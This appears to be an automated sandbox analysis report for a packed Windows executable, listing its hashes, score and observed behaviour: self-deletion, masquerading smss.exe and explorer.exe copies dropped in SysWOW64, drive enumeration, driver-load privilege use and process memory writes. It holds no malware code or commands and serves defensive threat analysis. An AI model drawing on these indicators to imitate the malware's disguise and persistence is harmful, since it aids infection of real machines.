2f11fd0a2aba6d5d3485033ccad0d668d66fd10c366b11f199b3bdbb2b67c398

Analysis

max time kernel
71s
max time network
118s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
04/02/2024, 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8df3011621508198c7546c5841d055e5.exe
Size

78KB
MD5

8df3011621508198c7546c5841d055e5
SHA1

3d6c2def59cd327c0752ce00c1c12513e6b9b73a
SHA256

2f11fd0a2aba6d5d3485033ccad0d668d66fd10c366b11f199b3bdbb2b67c398
SHA512

8808589b0127be53d5ca24eb4b181df559df6d5d6b1f14fe5528a2c01def4e295040b1f544dd3ec156d502d1d127b631d56893339e31556ead4ed6b8dfd8cf18
SSDEEP

1536:uuAbVcACMLwDynAd3fEW2USe+lBHaFhhtK0P2Ah76VFhbe+Msg6ZN:uuqOeMDyn08HBHIT36VPbC

Score

7^/10

upx

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
3012	cmd.exe

Executes dropped EXE 64 IoCs

pid	Process
2652	qqkavmfxmtfe.exe
1920	smss.exe
2744	smss.exe
1900	smss.exe
1904	smss.exe
1688	smss.exe
1924	smss.exe
2760	smss.exe
848	smss.exe
1180	smss.exe
3040	smss.exe
1864	smss.exe
1880	smss.exe
1216	smss.exe
560	smss.exe
1172	smss.exe
1560	smss.exe
980	explorer.exe
1152	smss.exe
1100	smss.exe
1056	explorer.exe
1432	smss.exe
2220	smss.exe
2156	smss.exe
2096	explorer.exe
2392	smss.exe
3036	smss.exe
880	smss.exe
2008	explorer.exe
2160	smss.exe
1608	smss.exe
2036	smss.exe
2168	smss.exe
2252	explorer.exe
2552	smss.exe
2972	smss.exe
2692	smss.exe
1976	smss.exe
2964	smss.exe
1916	smss.exe
2460	explorer.exe
2500	smss.exe
2736	smss.exe
1992	smss.exe
1908	smss.exe
1484	smss.exe
2548	smss.exe
2932	smss.exe
2780	explorer.exe
1680	smss.exe
1640	smss.exe
2248	smss.exe
1644	smss.exe
1444	smss.exe
1020	smss.exe
584	smss.exe
1888	explorer.exe
1760	smss.exe
1300	smss.exe
2340	smss.exe
1228	smss.exe
2896	smss.exe
1184	smss.exe
1084	smss.exe

Loads dropped DLL 64 IoCs

pid	Process
2652	qqkavmfxmtfe.exe
2652	qqkavmfxmtfe.exe
1920	smss.exe
1920	smss.exe
2744	smss.exe
2744	smss.exe
1900	smss.exe
1900	smss.exe
1904	smss.exe
1904	smss.exe
1688	smss.exe
1688	smss.exe
1924	smss.exe
1924	smss.exe
2760	smss.exe
2760	smss.exe
848	smss.exe
848	smss.exe
1180	smss.exe
1180	smss.exe
3040	smss.exe
3040	smss.exe
1864	smss.exe
1864	smss.exe
1880	smss.exe
1880	smss.exe
1216	smss.exe
1216	smss.exe
560	smss.exe
560	smss.exe
1172	smss.exe
1172	smss.exe
2652	qqkavmfxmtfe.exe
2652	qqkavmfxmtfe.exe
1560	smss.exe
1560	smss.exe
980	explorer.exe
980	explorer.exe
1920	smss.exe
1920	smss.exe
1152	smss.exe
1152	smss.exe
1100	smss.exe
1100	smss.exe
1056	explorer.exe
1056	explorer.exe
2744	smss.exe
2744	smss.exe
1432	smss.exe
1432	smss.exe
2220	smss.exe
2220	smss.exe
2156	smss.exe
2156	smss.exe
1900	smss.exe
1900	smss.exe
2096	explorer.exe
2096	explorer.exe
2392	smss.exe
2392	smss.exe
3036	smss.exe
3036	smss.exe
880	smss.exe
880	smss.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a00000001220d-4.dat	upx
behavioral1/memory/2652-10-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1920-20-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2744-27-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1900-34-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1904-40-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1688-47-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1924-54-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1920-53-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2744-60-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2760-61-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/848-69-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1180-76-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/3040-84-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1924-91-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1864-92-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1880-100-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1216-109-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/560-117-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1172-134-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1560-143-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/980-144-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1152-148-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1100-149-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1056-150-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1432-154-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2220-155-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2096-157-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2156-156-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2392-161-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/3036-163-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/880-164-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2160-165-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1608-170-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2168-172-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2036-171-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2220-173-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2252-174-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2972-176-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2552-175-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2692-187-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2096-188-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2008-189-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1916-190-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2964-194-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2736-193-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2500-192-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2460-191-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1908-203-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1992-202-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2548-206-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1484-205-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2168-204-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2780-209-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1680-213-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1976-215-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1640-214-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2932-208-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/1916-223-0x0000000000400000-0x0000000000446000-memory.dmp	upx

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\t:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\j:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\s:	explorer.exe
File opened (read-only)	\??\k:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\w:	smss.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\e:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\w:	smss.exe
File opened (read-only)	\??\q:	smss.exe
File opened (read-only)	\??\s:	smss.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\k:	explorer.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\n:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\j:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\o:	explorer.exe
File opened (read-only)	\??\y:	smss.exe
File opened (read-only)	\??\j:	smss.exe
File opened (read-only)	\??\l:	smss.exe
File opened (read-only)	\??\h:	smss.exe
File opened (read-only)	\??\e:	smss.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\i:	smss.exe
File opened (read-only)	\??\g:	smss.exe
File opened (read-only)	\??\v:	smss.exe
File opened (read-only)	\??\u:	smss.exe
File opened (read-only)	\??\n:	smss.exe
File opened (read-only)	\??\q:	smss.exe
File opened (read-only)	\??\k:	smss.exe
File opened (read-only)	\??\v:	smss.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\o:	smss.exe
File opened (read-only)	\??\m:	smss.exe
File opened (read-only)	\??\w:	smss.exe
File opened (read-only)	\??\r:	smss.exe
File opened (read-only)	\??\t:	smss.exe
File opened (read-only)	\??\o:	smss.exe
File opened (read-only)	\??\g:	explorer.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\n:	explorer.exe
File opened (read-only)	\??\z:	smss.exe
File opened (read-only)	\??\g:	smss.exe
File opened (read-only)	\??\q:	smss.exe
File opened (read-only)	\??\s:	smss.exe
File opened (read-only)	\??\v:	smss.exe
File opened (read-only)	\??\k:	smss.exe
File opened (read-only)	\??\n:	smss.exe
File opened (read-only)	\??\l:	smss.exe
File opened (read-only)	\??\p:	smss.exe
File opened (read-only)	\??\x:	smss.exe
File opened (read-only)	\??\e:	smss.exe
File opened (read-only)	\??\k:	smss.exe
File opened (read-only)	\??\q:	smss.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File opened for modification	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File opened for modification	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	explorer.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	explorer.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File opened for modification	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe
File created	C:\Windows\SysWOW64\dnteevmgxabg\smss.exe	smss.exe
File created	C:\Windows\SysWOW64\hghrucnuijex\explorer.exe	smss.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EBD3ADB1-C301-11EE-8A74-66F723737CE2} = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeLoadDriverPrivilege	2652	qqkavmfxmtfe.exe
Token: SeLoadDriverPrivilege	1920	smss.exe
Token: SeLoadDriverPrivilege	2744	smss.exe
Token: SeLoadDriverPrivilege	1900	smss.exe
Token: SeLoadDriverPrivilege	1904	smss.exe
Token: SeLoadDriverPrivilege	1688	smss.exe
Token: SeLoadDriverPrivilege	1924	smss.exe
Token: SeLoadDriverPrivilege	2760	smss.exe
Token: SeLoadDriverPrivilege	848	smss.exe
Token: SeLoadDriverPrivilege	1180	smss.exe
Token: SeLoadDriverPrivilege	3040	smss.exe
Token: SeLoadDriverPrivilege	1864	smss.exe
Token: SeLoadDriverPrivilege	1880	smss.exe
Token: SeLoadDriverPrivilege	1216	smss.exe
Token: SeLoadDriverPrivilege	560	smss.exe
Token: SeLoadDriverPrivilege	1172	smss.exe
Token: SeLoadDriverPrivilege	1560	smss.exe
Token: SeLoadDriverPrivilege	980	explorer.exe
Token: SeLoadDriverPrivilege	1152	smss.exe
Token: SeLoadDriverPrivilege	1100	smss.exe
Token: SeLoadDriverPrivilege	1056	explorer.exe
Token: SeLoadDriverPrivilege	1432	smss.exe
Token: SeLoadDriverPrivilege	2220	smss.exe
Token: SeLoadDriverPrivilege	2156	smss.exe
Token: SeLoadDriverPrivilege	2096	explorer.exe
Token: SeLoadDriverPrivilege	2392	smss.exe
Token: SeLoadDriverPrivilege	3036	smss.exe
Token: SeLoadDriverPrivilege	880	smss.exe
Token: SeLoadDriverPrivilege	2008	explorer.exe
Token: SeLoadDriverPrivilege	2160	smss.exe
Token: SeLoadDriverPrivilege	1608	smss.exe
Token: SeLoadDriverPrivilege	2036	smss.exe
Token: SeLoadDriverPrivilege	2168	smss.exe
Token: SeLoadDriverPrivilege	2252	explorer.exe
Token: SeLoadDriverPrivilege	2972	smss.exe
Token: SeLoadDriverPrivilege	2552	smss.exe
Token: SeLoadDriverPrivilege	2692	smss.exe
Token: SeLoadDriverPrivilege	1976	smss.exe
Token: SeLoadDriverPrivilege	2964	smss.exe
Token: SeLoadDriverPrivilege	1916	smss.exe
Token: SeLoadDriverPrivilege	2460	explorer.exe
Token: SeLoadDriverPrivilege	2500	smss.exe
Token: SeLoadDriverPrivilege	2736	smss.exe
Token: SeLoadDriverPrivilege	1992	smss.exe
Token: SeLoadDriverPrivilege	1908	smss.exe
Token: SeLoadDriverPrivilege	1484	smss.exe
Token: SeLoadDriverPrivilege	2548	smss.exe
Token: SeLoadDriverPrivilege	2932	smss.exe
Token: SeLoadDriverPrivilege	2780	explorer.exe
Token: SeLoadDriverPrivilege	1680	smss.exe
Token: SeLoadDriverPrivilege	1640	smss.exe
Token: SeLoadDriverPrivilege	2248	smss.exe
Token: SeLoadDriverPrivilege	1644	smss.exe
Token: SeLoadDriverPrivilege	1444	smss.exe
Token: SeLoadDriverPrivilege	1020	smss.exe
Token: SeLoadDriverPrivilege	584	smss.exe
Token: SeLoadDriverPrivilege	1888	explorer.exe
Token: SeLoadDriverPrivilege	1760	smss.exe
Token: SeLoadDriverPrivilege	1300	smss.exe
Token: SeLoadDriverPrivilege	2340	smss.exe
Token: SeLoadDriverPrivilege	1228	smss.exe
Token: SeLoadDriverPrivilege	2896	smss.exe
Token: SeLoadDriverPrivilege	1184	smss.exe
Token: SeLoadDriverPrivilege	1084	smss.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2976	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2976	IEXPLORE.EXE
2976	IEXPLORE.EXE
2596	IEXPLORE.EXE
2596	IEXPLORE.EXE
2596	IEXPLORE.EXE
2596	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2064 wrote to memory of 2972	2064	8df3011621508198c7546c5841d055e5.exe	28
PID 2064 wrote to memory of 2972	2064	8df3011621508198c7546c5841d055e5.exe	28
PID 2064 wrote to memory of 2972	2064	8df3011621508198c7546c5841d055e5.exe	28
PID 2064 wrote to memory of 2972	2064	8df3011621508198c7546c5841d055e5.exe	28
PID 2972 wrote to memory of 2976	2972	iexplore.exe	29
PID 2972 wrote to memory of 2976	2972	iexplore.exe	29
PID 2972 wrote to memory of 2976	2972	iexplore.exe	29
PID 2972 wrote to memory of 2976	2972	iexplore.exe	29
PID 2976 wrote to memory of 2596	2976	IEXPLORE.EXE	31
PID 2976 wrote to memory of 2596	2976	IEXPLORE.EXE	31
PID 2976 wrote to memory of 2596	2976	IEXPLORE.EXE	31
PID 2976 wrote to memory of 2596	2976	IEXPLORE.EXE	31
PID 2064 wrote to memory of 2652	2064	8df3011621508198c7546c5841d055e5.exe	32
PID 2064 wrote to memory of 2652	2064	8df3011621508198c7546c5841d055e5.exe	32
PID 2064 wrote to memory of 2652	2064	8df3011621508198c7546c5841d055e5.exe	32
PID 2064 wrote to memory of 2652	2064	8df3011621508198c7546c5841d055e5.exe	32
PID 2652 wrote to memory of 1920	2652	qqkavmfxmtfe.exe	33
PID 2652 wrote to memory of 1920	2652	qqkavmfxmtfe.exe	33
PID 2652 wrote to memory of 1920	2652	qqkavmfxmtfe.exe	33
PID 2652 wrote to memory of 1920	2652	qqkavmfxmtfe.exe	33
PID 1920 wrote to memory of 2744	1920	smss.exe	35
PID 1920 wrote to memory of 2744	1920	smss.exe	35
PID 1920 wrote to memory of 2744	1920	smss.exe	35
PID 1920 wrote to memory of 2744	1920	smss.exe	35
PID 2744 wrote to memory of 1900	2744	smss.exe	36
PID 2744 wrote to memory of 1900	2744	smss.exe	36
PID 2744 wrote to memory of 1900	2744	smss.exe	36
PID 2744 wrote to memory of 1900	2744	smss.exe	36
PID 1900 wrote to memory of 1904	1900	smss.exe	37
PID 1900 wrote to memory of 1904	1900	smss.exe	37
PID 1900 wrote to memory of 1904	1900	smss.exe	37
PID 1900 wrote to memory of 1904	1900	smss.exe	37
PID 1904 wrote to memory of 1688	1904	smss.exe	38
PID 1904 wrote to memory of 1688	1904	smss.exe	38
PID 1904 wrote to memory of 1688	1904	smss.exe	38
PID 1904 wrote to memory of 1688	1904	smss.exe	38
PID 1688 wrote to memory of 1924	1688	smss.exe	39
PID 1688 wrote to memory of 1924	1688	smss.exe	39
PID 1688 wrote to memory of 1924	1688	smss.exe	39
PID 1688 wrote to memory of 1924	1688	smss.exe	39
PID 1924 wrote to memory of 2760	1924	smss.exe	40
PID 1924 wrote to memory of 2760	1924	smss.exe	40
PID 1924 wrote to memory of 2760	1924	smss.exe	40
PID 1924 wrote to memory of 2760	1924	smss.exe	40
PID 2760 wrote to memory of 848	2760	smss.exe	41
PID 2760 wrote to memory of 848	2760	smss.exe	41
PID 2760 wrote to memory of 848	2760	smss.exe	41
PID 2760 wrote to memory of 848	2760	smss.exe	41
PID 848 wrote to memory of 1180	848	smss.exe	42
PID 848 wrote to memory of 1180	848	smss.exe	42
PID 848 wrote to memory of 1180	848	smss.exe	42
PID 848 wrote to memory of 1180	848	smss.exe	42
PID 1180 wrote to memory of 3040	1180	smss.exe	43
PID 1180 wrote to memory of 3040	1180	smss.exe	43
PID 1180 wrote to memory of 3040	1180	smss.exe	43
PID 1180 wrote to memory of 3040	1180	smss.exe	43
PID 3040 wrote to memory of 1864	3040	smss.exe	44
PID 3040 wrote to memory of 1864	3040	smss.exe	44
PID 3040 wrote to memory of 1864	3040	smss.exe	44
PID 3040 wrote to memory of 1864	3040	smss.exe	44
PID 1864 wrote to memory of 1880	1864	smss.exe	45
PID 1864 wrote to memory of 1880	1864	smss.exe	45
PID 1864 wrote to memory of 1880	1864	smss.exe	45
PID 1864 wrote to memory of 1880	1864	smss.exe	45

C:\Users\Admin\AppData\Local\Temp\8df3011621508198c7546c5841d055e5.exe
"C:\Users\Admin\AppData\Local\Temp\8df3011621508198c7546c5841d055e5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2064
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
